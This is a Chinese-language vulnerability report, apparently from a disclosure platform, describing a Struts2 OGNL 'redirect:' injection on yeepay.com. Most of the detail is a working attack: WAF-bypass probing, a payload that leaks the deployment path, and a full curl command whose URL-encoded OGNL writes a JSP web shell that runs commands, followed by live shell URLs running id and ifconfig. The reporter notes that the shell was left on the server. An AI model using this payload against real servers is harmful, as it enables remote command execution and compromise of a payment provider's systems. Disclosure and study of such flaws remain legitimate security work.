漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:易宝支付某漏洞修复不当可致GETSHELL
提交时间:2014-12-21 10:17
修复时间:2015-02-04 10:18
公开时间:2015-02-04 10:18
漏洞类型:系统/服务补丁不及时
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情 披露状态:
2014-12-21: 细节已通知厂商并且等待厂商处理中 2014-12-24: 厂商已经确认,细节仅向厂商公开 2015-01-03: 细节向核心白帽子及相关领域专家公开 2015-01-13: 细节向普通白帽子公开 2015-01-23: 细节向实习白帽子公开 2015-02-04: 细节向公众公开
简要描述: 影响www域下应用。
详细说明: http://www.yeepay.com/individualservice/Login.action 看到action习惯性测试struts漏洞,http://www.yeepay.com/individualservice/Login.action?redirect:/xxoo
HTTP/1.1 302 Moved Temporarily Server: Tengine/2.0.3 Date: Sat, 20 Dec 2014 08:34:12 GMT Content-Length: 0 Connection: keep-alive Location: http://www.yeepay.com/individualservice/xxoo Content-Language: zh-CN Set-Cookie: BIGipServerpool_css=2736695488.36895.0000; expires=Sat, 20-Dec-2014 8:49:12 GMT; path=/
咦,跳转了,有戏,果断上命令exp。最后却发现被waf拦截了。
不死心继续。。。测试发现waf过滤了allowStaticMethodAccess、processBuilder,命令执行无望,尝试能不能写shell。 http://www.yeepay.com/individualservice/Login.action?java.io.File ---> is OK http://www.yeepay.com/individualservice/Login.action?java.io.PrintWriter --->is OK 可以File操作,看来只针对命令执行的exp提取关键字添加规则进行过滤,对File操作是放行的。下面就开始写shell了。 0x1 找web目录 org.apache.catalina.jsp_classpath里面包含得有项目部署路径,可以从中找出来。由于yeepay web容器为jboss,对url长度好像有限制,所以需要截取(自己本地Tomcat测试则没有)。检索individualservice位置:
http://www.yeepay.com/individualservice/Login.action?redirect:${%23application.get(%27org.apache.catalina.jsp_classpath%27).indexOf(%22individualservice%22)} HTTP/1.1 302 Moved Temporarily Server: Tengine/2.0.3 Date: Sat, 20 Dec 2014 08:55:06 GMT Content-Length: 0 Connection: keep-alive Location: http://www.yeepay.com/individualservice/8232 Content-Language: zh-CN
位置为8232,substring调整长度:
curl -i http://www.yeepay.com/individualservice/Login.action -d 'redirect:${%23application.get(%27org.apache.catalina.jsp_classpath%27).substring(8100,8400)}' HTTP/1.1 302 Moved Temporarily Server: Tengine/2.0.3 Date: Sat, 20 Dec 2014 10:01:42 GMT Content-Length: 0 Connection: keep-alive Location: http://www.yeepay.com/individualservice/efault/tmp/deploy/tmp4813126319445231330servlets-default.jar:/export/home/jboss-4.0.3SP1/server/default/deploy/jbossweb-tomcat55.sar/:/export/home/jboss-4.0.3SP1/server/default/deploy/individualservice.war/:/export/home/jboss-4.0.3SP1/lib/gnu-regexp.jar:/export/home/jboss-4.0.3SP1/server/default/lib Content-Language: zh-CN Set-Cookie: BIGipServerpool_css=186558656.36895.0000; expires=Sat, 20-Dec-2014 10:16:42 GMT; path=/
找到web目录: /export/home/jboss-4.0.3SP1/server/default/deploy/individualservice.war 0x2 写shell
curl -i 'http://www.yeepay.com/individualservice/Login.action' -d 'redirect:${(%23a%3d(new%20java.io.PrintWriter(%22/export/home/jboss-4.0.3SP1/server/default/deploy/individualservice.war/lala.jsp%22)),%23a.write(%27%3C%25%40%20page%20import%3D%22java.io.*%22%20%25%3E%20%3C%25%20String%20cmd%20%3D%20request.getParameter(%22cmd%22)%3B%20String%20output%20%3D%20%22%22%3B%20if(cmd%20!%3D%20null)%20%7B%20String%20s%20%3D%20null%3B%20try%20%7B%20Process%20p%20%3D%20Runtime.getRuntime().exec(cmd)%3B%20BufferedReader%20sI%20%3D%20new%20BufferedReader(new%20InputStreamReader(p.getInputStream()))%3B%20while((s%20%3D%20sI.readLine())%20!%3D%20null)%20%7B%20output%20%2B%3D%20s%20%2B%22%5C%5Cr%5C%5Cn%22%3B%20%7D%20%7D%20catch(IOException%20e)%20%7B%20e.printStackTrace()%3B%20%7D%20%7D%20%25%3E%20%3Cpre%3E%20%3C%25%3Doutput%20%25%3E%20%3C%2Fpre%3E%27),%23a.close())%2b%23a}' HTTP/1.1 302 Moved Temporarily Server: Tengine/2.0.3 Date: Sat, 20 Dec 2014 10:04:00 GMT Content-Length: 0 Connection: keep-alive Location: http://www.yeepay.com/individualservice/nulljava.io.PrintWriter@1517394 Content-Language: zh-CN Set-Cookie: BIGipServerpool_css=2736695488.36895.0000; expires=Sat, 20-Dec-2014 10:19:00 GMT; path=/
shell地址: http://www.yeepay.com/individualservice/lala.jsp
存在同一问题其他站点应用:
http://www.yeepay.com/selfservice/requestRegister.action http://m.yeepay.com/donategroup/PrintDonateCert.action http://gongyi.yeepay.com/mlove/showMediaInfo.action http://zht.yeepay.com/zhtservice/login.action
漏洞证明: http://www.yeepay.com/individualservice/lala.jsp?cmd=id
http://zht.yeepay.com/zhtservice/lala.jsp?cmd=/sbin/ifconfig
http://m.yeepay.com/boss_donategroup/test.txt http://m.yeepay.com/donategroup/test.txt
修复方案: 赶紧修复吧。测试过程只写一个lala.jsp,未删。没有动数据。
漏洞回应 厂商回应: 危害等级:高
漏洞Rank:20
确认时间:2014-12-24 14:41
厂商回复: 代码历经多年,风风雨雨,修修补补,难免侧漏时候。感谢白帽子的提交,为我们推进安全整改提供强劲动力。
最新状态: 暂无
漏洞评价:
评论
2014-12-21 10:20 |
爱上平顶山 ( 核心白帽子 | Rank:2738 漏洞数:547 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)
2014-12-21 10:59 |
luwikes ( 普通白帽子 | Rank:512 漏洞数:77 | 潜心学习~~~)
2014-12-21 11:02 |
loopx9 ( 核心白帽子 | Rank:602 漏洞数:62 | ..)
2014-12-21 12:22 |
爱上平顶山 ( 核心白帽子 | Rank:2738 漏洞数:547 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)
2014-12-21 16:05 |
luwikes ( 普通白帽子 | Rank:512 漏洞数:77 | 潜心学习~~~)
@loopx9 @爱上平顶山 发现是一回事,能利用是另一回事
2014-12-21 17:36 |
淡漠天空 ( 实习白帽子 | Rank:1113 漏洞数:142 | M:出售GOV STATE NSA CIA NASA DHS Symant...)
@爱上平顶山 发现是一回事,能利用是另一回事,内网瘫痪业务又是另一回事
2014-12-21 18:11 |
风萧萧 ( 核心白帽子 | Rank:1020 漏洞数:76 | 人这一辈子总要动真格的爱上什么人)
2014-12-21 18:21 |
淡漠天空 ( 实习白帽子 | Rank:1113 漏洞数:142 | M:出售GOV STATE NSA CIA NASA DHS Symant...)
2014-12-21 18:31 |
淡漠天空 ( 实习白帽子 | Rank:1113 漏洞数:142 | M:出售GOV STATE NSA CIA NASA DHS Symant...)
@风萧萧 忘了说 赶紧留言修洞去。。。设置个web.xml就想骗我你太天真了。。。
2014-12-21 23:44 |
小胖胖要减肥 ( 普通白帽子 | Rank:686 漏洞数:101 )
2014-12-22 01:21 |
淡漠天空 ( 实习白帽子 | Rank:1113 漏洞数:142 | M:出售GOV STATE NSA CIA NASA DHS Symant...)
@小胖胖要减肥 他已经默默修洞去了。。。算了吧 揍了我就不敢去上海了。。。
2014-12-22 11:53 |
小胖胖要减肥 ( 普通白帽子 | Rank:686 漏洞数:101 )
2014-12-22 13:16 |
淡漠天空 ( 实习白帽子 | Rank:1113 漏洞数:142 | M:出售GOV STATE NSA CIA NASA DHS Symant...)
2014-12-22 14:45 |
小胖胖要减肥 ( 普通白帽子 | Rank:686 漏洞数:101 )
2015-02-04 10:36 |
zzR ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])